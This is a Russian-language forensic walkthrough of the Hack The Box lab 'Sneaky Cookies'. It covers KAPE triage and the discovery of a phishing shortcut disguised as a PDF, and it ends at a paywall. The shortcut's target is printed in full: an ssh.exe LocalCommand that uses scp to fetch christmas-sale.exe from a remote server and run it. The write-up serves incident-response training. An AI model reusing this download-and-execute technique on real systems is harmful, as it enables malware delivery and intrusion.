Упражняться мы будем на лабораторной работе OpTinselTrace24-1: Sneaky Cookies из раздела Sherlocks популярного обучающего ресурса Hack The Box.
OpTinselTrace24-1: Sneaky Cookies
Из описания лабы узнаём, что мы будем работать со скомпрометированной учетной записью пользователя Bingle Jollybeard, который пытался настроить свою систему для удаленного доступа.
Киберзлодей Крампус проник в цифровую инфраструктуру мастерской Санты. После прошлогоднего инцидента Санта сказал своей команде быть начеку и быть готовыми к социальной инженерии. Системному администратору он поручил усилить безопасность. Бингл Джоллиберд, разработчик приложений, который будет работать удаленно с Южного полюса, посетил мастерскую, чтобы настроить свою систему для удаленного доступа. Его рабочая станция была загадочным образом скомпрометирована, что может дать Крампусу возможность творить беспредел. Разберитесь, что произошло, используя полученные с хоста артефакты.
Нам предоставлены данные диска C, на котором есть учетка пользователя, логи и prefetch-файлы.
Для начала, чтобы облегчить себе задачу, прогоним папку C через KAPE.
Справка: KAPE
Kroll Artifact Parser and Extractor (KAPE) — это мощная утилита для цифровой криминалистики. Она позволяет быстро собирать и анализировать цифровые артефакты с устройств. Ее автор Эрик Циммерман — известный эксперт в области DFIR. KAPE оптимизирует процессы сбора данных, позволяя находить критически важные артефакты за считаные минуты. Инструмент поддерживает гибкую настройку с помощью модулей для сбора (Targets) и анализа (Modules), что делает его универсальным и удобным для расследования инцидентов, проверки на компрометацию и анализа подозрительной активности. KAPE широко применяется в судебной экспертизе, корпоративной безопасности и реагировании на инциденты благодаря своей скорости, точности и способности обрабатывать огромные объемы данных.
kape.exe --msource "C:\путь к папке\TRIAGE-L3-BELLS" --module !EZParser --mdest "С:\путь к папке с результатом" --trace --debug
KAPE собрал нам все необходимые для расследования данные в удобном формате. Он распарсил все логи, файлы предварительной загрузки и некоторые кусты реестра. Заодно конвертировал их в формат CSV.
info
Дальше в статье я буду параллельно приводить примеры использования других инструментов на случай, если ты захочешь повторить исследование без KAPE.
Фишинг
Чтобы ответить на первый вопрос лабораторной работы, нам нужно найти подозрительные файлы в пользовательском каталоге. Давай обратимся к исходной папке C, где в директории Documents пользователя Bingle Jollybeard лежит файл christmas_slab..
Подозрительно здесь лишь необычное отображение ярлыка для формата PDF. При детальном изучении оказывается, что это не PDF, а ярлык (.lnk).
Злоумышленник использовал этот файл для фишинга. Ссылка указывает на такой адрес:
C:\Windows\System32\OpenSSH\ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17.43.12.31
Здесь запускается SSH, чтобы загрузить с управляющего сервера и выполнить файл christmas-sale..
Продолжение доступно только участникам
Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».
Присоединяйся к сообществу «Xakep.ru»!
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
